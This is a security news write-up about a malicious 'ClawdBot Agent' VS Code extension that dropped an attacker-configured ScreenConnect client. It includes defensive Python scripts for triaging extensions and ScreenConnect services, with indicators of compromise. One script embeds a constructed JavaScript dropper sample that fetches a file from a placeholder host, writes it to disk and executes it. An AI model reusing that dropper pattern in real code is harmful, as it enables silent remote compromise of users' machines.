Developers who rely on coding tools every day are the target of a malicious VS Code extension that has emerged in the threat landscape. The phony "ClawdBot Agent" extension, discovered on January 27, 2026, posed as a trustworthy AI-powered assistant but actually carried a dangerous payload.
The impostor registered the name first and deceived users into installing it; the real Clawdbot service never published an official VS Code extension. Security monitoring systems flagged the threat right away, noticing strange activity as soon as VS Code launched. The deception went beyond name theft: the extension integrated with well-known AI providers such as OpenAI, Anthropic, and Google, working exactly as promised.
Because users had no reason to suspect malicious activity, this working functionality gave them a false sense of security. Within seconds of installation, the extension silently installed malware on Windows computers without the user's knowledge or consent. After being notified, Microsoft acted quickly and removed the extension from its marketplace.
After a thorough investigation, Aikido security analysts determined the true nature of this threat. They found that the extension included code intended to execute automatically each time Visual Studio Code launched. The JavaScript code connected to an external server to obtain configuration instructions, then downloaded and ran several malicious files disguised as genuine system components.
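The behaviour described above (activation on every launch, a call-out to a remote host for configuration, a downloaded file written to disk and executed) can be triaged offline from an extension's package.json and its entry script. The script below is an added example, not Aikido's tooling and not the ClawdBot extension's code; the indicator patterns, the risk thresholds and both sample extensions (including the placeholder host config.example-c2.invalid) are constructed for illustration.

```python
"""Triage installed VS Code extensions for the dropper pattern: startup activation,
network call-out, file written to disk, process spawned. Added example; the
indicator regexes and samples are constructed, not taken from the real extension."""
import json
import re
from pathlib import Path

# activationEvents values that make an extension run on every VS Code start
STARTUP_EVENTS = {"*", "onStartupFinished"}

# Source-level indicators, each a regex applied to the extension's entry script
INDICATORS = {
    "network-fetch": re.compile(r"\b(https?\.(?:get|request)|fetch|axios\.(?:get|post))\s*\("),
    "process-spawn": re.compile(r"\b(?:exec|execFile|spawn|execSync|execFileSync)\s*\("),
    "writes-to-disk": re.compile(r"\bfs\.(?:writeFile|writeFileSync|createWriteStream)\s*\("),
    "hardcoded-remote": re.compile(r"https?://[\w.-]+"),
}


def activates_on_startup(manifest: dict) -> bool:
    """True if the manifest asks VS Code to activate the extension on every launch."""
    events = manifest.get("activationEvents") or []
    return any(e in STARTUP_EVENTS for e in events)


def scan_source(source: str) -> set:
    """Return the indicator labels whose pattern appears in the entry script."""
    return {label for label, rx in INDICATORS.items() if rx.search(source)}


def assess(manifest: dict, source: str) -> dict:
    """Combine manifest and source findings into a risk rating.

    'high' is the shape from the article: runs at startup, reaches out over the
    network and launches something. 'medium' is a partial match worth a manual
    look; everything else is 'low'.
    """
    startup = activates_on_startup(manifest)
    labels = scan_source(source)
    reaches_out = bool(labels & {"network-fetch", "hardcoded-remote"})
    if startup and reaches_out and "process-spawn" in labels:
        risk = "high"
    elif (startup and labels) or "process-spawn" in labels:
        risk = "medium"
    else:
        risk = "low"
    return {"id": f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}",
            "startup": startup, "indicators": sorted(labels), "risk": risk}


def scan_extensions_dir(root: Path = Path.home() / ".vscode" / "extensions") -> list:
    """Assess every installed extension under the default VS Code extensions folder."""
    results = []
    for manifest_path in root.glob("*/package.json"):
        manifest = json.loads(manifest_path.read_text(encoding="utf-8", errors="replace"))
        entry = manifest_path.parent / manifest.get("main", "extension.js")
        source = entry.read_text(encoding="utf-8", errors="replace") if entry.is_file() else ""
        results.append(assess(manifest, source))
    return results


# Constructed samples (not the real extension's code). The suspect one mirrors the
# described behaviour: startup activation, config fetched from a placeholder host,
# payload written to the temp directory and executed.
BENIGN_MANIFEST = {"publisher": "acme", "name": "hello",
                   "activationEvents": ["onCommand:hello.say"], "main": "./out/extension.js"}
BENIGN_SOURCE = '''
const vscode = require("vscode");
exports.activate = (ctx) => ctx.subscriptions.push(
  vscode.commands.registerCommand("hello.say", () => vscode.window.showInformationMessage("hi")));
'''
SUSPECT_MANIFEST = {"publisher": "unknown-dev", "name": "clawdbot-agent-lookalike",
                    "activationEvents": ["*"], "main": "./out/extension.js"}
SUSPECT_SOURCE = '''
const https = require("https"), fs = require("fs"), os = require("os"), path = require("path");
const { execFile } = require("child_process");
exports.activate = () => {
  https.get("https://config.example-c2.invalid/cfg", (res) => {   // placeholder host
    let body = ""; res.on("data", (d) => body += d);
    res.on("end", () => { const dst = path.join(os.tmpdir(), "update.exe");
                          fs.writeFileSync(dst, body); execFile(dst); });
  });
};
'''

if __name__ == "__main__":
    for m, s in ((BENIGN_MANIFEST, BENIGN_SOURCE), (SUSPECT_MANIFEST, SUSPECT_SOURCE)):
        print(assess(m, s))
    for r in scan_extensions_dir():          # real installed extensions, if any
        if r["risk"] != "low":
            print(r)
```

The rating is a triage aid, not a verdict: plenty of legitimate extensions activate at startup or spawn a language server, so a "medium" result means "read the entry script", while a "high" result combining all three behaviours is the pattern to investigate first.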
ScreenConnect Deployment and Infection Mechanism

The most alarming feature is the way the attackers weaponized trustworthy remote access software.
The dropper used ScreenConnect, a legitimate IT support tool, configured to connect to attacker-controlled servers at meeting.bulletmailer.net on port 8041. The attackers ran their own ScreenConnect relay server and used the VS Code extension to distribute pre-configured client installers. Unbeknownst to the victims, they received a fully functional ScreenConnect client that immediately established remote connections to the attacker's infrastructure.
A Rust-based DLL provided redundant delivery, fetching backup payloads from Dropbox disguised as a Zoom update. This multi-layered strategy ensured the infection would succeed even if the main command-and-control servers were taken down. The attackers demonstrated advanced operational planning by using three different fallback mechanisms. Anyone who installed this extension should uninstall it immediately, remove the ScreenConnect client from their computers, and block the infrastructure domains.
Rotating API keys for any AI services accessed through the extension is strongly recommended. This threat underscores how crucial it is to verify the legitimacy of extensions before installing them.
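To act on the remediation steps above (remove the ScreenConnect client, block the relay infrastructure), a responder first needs to know which installed ScreenConnect clients point at meeting.bulletmailer.net on port 8041 rather than at a relay the organisation actually operates. The script below is an added example, not the article's or any vendor's tooling: it classifies Windows service command lines, assumes the ScreenConnect client service registers its relay settings as a query-string argument (h= host, p= port), and can read ImagePath values from the registry on a live Windows host. The sample services, the instance IDs and the "known good" relay support.example-corp.internal are constructed.

```python
"""Find ScreenConnect clients pointing at known-bad relay infrastructure.
Added example. Assumes the client service command line carries relay settings as
"?e=Access&y=Guest&h=<relay host>&p=<port>&..."; verify that against your own hosts."""
import platform
import re
from urllib.parse import parse_qs

# Relay endpoint reported for this campaign (from the article)
BLOCKED_RELAYS = {("meeting.bulletmailer.net", "8041")}
# Relay hosts your organisation legitimately uses (constructed placeholder)
KNOWN_GOOD_RELAYS = {"support.example-corp.internal"}

# The quoted argument starting with "?" that holds the client's relay settings
QUERY_RE = re.compile(r'"\?([^"]*)"')


def parse_screenconnect_cmdline(cmdline: str):
    """Extract relay host, port and mode from a ScreenConnect client service
    command line; returns None for services that are not ScreenConnect clients."""
    if "screenconnect" not in cmdline.lower():
        return None
    m = QUERY_RE.search(cmdline)
    if not m:
        return None
    q = parse_qs(m.group(1))
    first = lambda k: q.get(k, [""])[0]
    return {"mode": first("e"), "relay_host": first("h").lower(), "relay_port": first("p")}


def classify(service_name: str, cmdline: str):
    """Label one service: malicious-relay, expected, or unknown-relay (manual review)."""
    info = parse_screenconnect_cmdline(cmdline)
    if info is None:
        return None
    if (info["relay_host"], info["relay_port"]) in BLOCKED_RELAYS:
        verdict = "malicious-relay"
    elif info["relay_host"] in KNOWN_GOOD_RELAYS:
        verdict = "expected"
    else:
        verdict = "unknown-relay"
    return {"service": service_name, "verdict": verdict, **info}


def triage_services(services):
    """services: iterable of (service name, command line) pairs.
    Returns a finding for every ScreenConnect client found."""
    return [r for r in (classify(n, c) for n, c in services) if r]


def windows_services():
    """On Windows, read every service's ImagePath from the registry; elsewhere []."""
    if platform.system() != "Windows":
        return []
    import winreg
    out, i = [], 0
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        while True:
            try:
                name = winreg.EnumKey(root, i)
            except OSError:
                break
            i += 1
            try:
                with winreg.OpenKey(root, name) as k:
                    out.append((name, winreg.QueryValueEx(k, "ImagePath")[0]))
            except OSError:
                continue   # service key without an ImagePath value
    return out


# Constructed sample service table: one unrelated service, one client on the
# organisation's own relay, one client on the campaign's relay.
SAMPLE_SERVICES = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("ScreenConnect Client (1a2b3c4d5e6f)",
     r'"C:\Program Files (x86)\ScreenConnect Client (1a2b3c4d5e6f)\ScreenConnect.ClientService.exe" '
     r'"?e=Access&y=Guest&h=support.example-corp.internal&p=443&s=00000000-0000-0000-0000-000000000001&k=PLACEHOLDER"'),
    ("ScreenConnect Client (f6e5d4c3b2a1)",
     r'"C:\Program Files (x86)\ScreenConnect Client (f6e5d4c3b2a1)\ScreenConnect.ClientService.exe" '
     r'"?e=Access&y=Guest&h=meeting.bulletmailer.net&p=8041&s=00000000-0000-0000-0000-000000000002&k=PLACEHOLDER"'),
]

if __name__ == "__main__":
    services = windows_services() or SAMPLE_SERVICES
    for finding in triage_services(services):
        print(finding)
```

A "malicious-relay" finding names the exact service to stop and remove; an "unknown-relay" finding is not proof of compromise, but any ScreenConnect client whose relay host nobody in IT recognises deserves the same review, since the indicator is the attacker's relay, not the ScreenConnect binary itself.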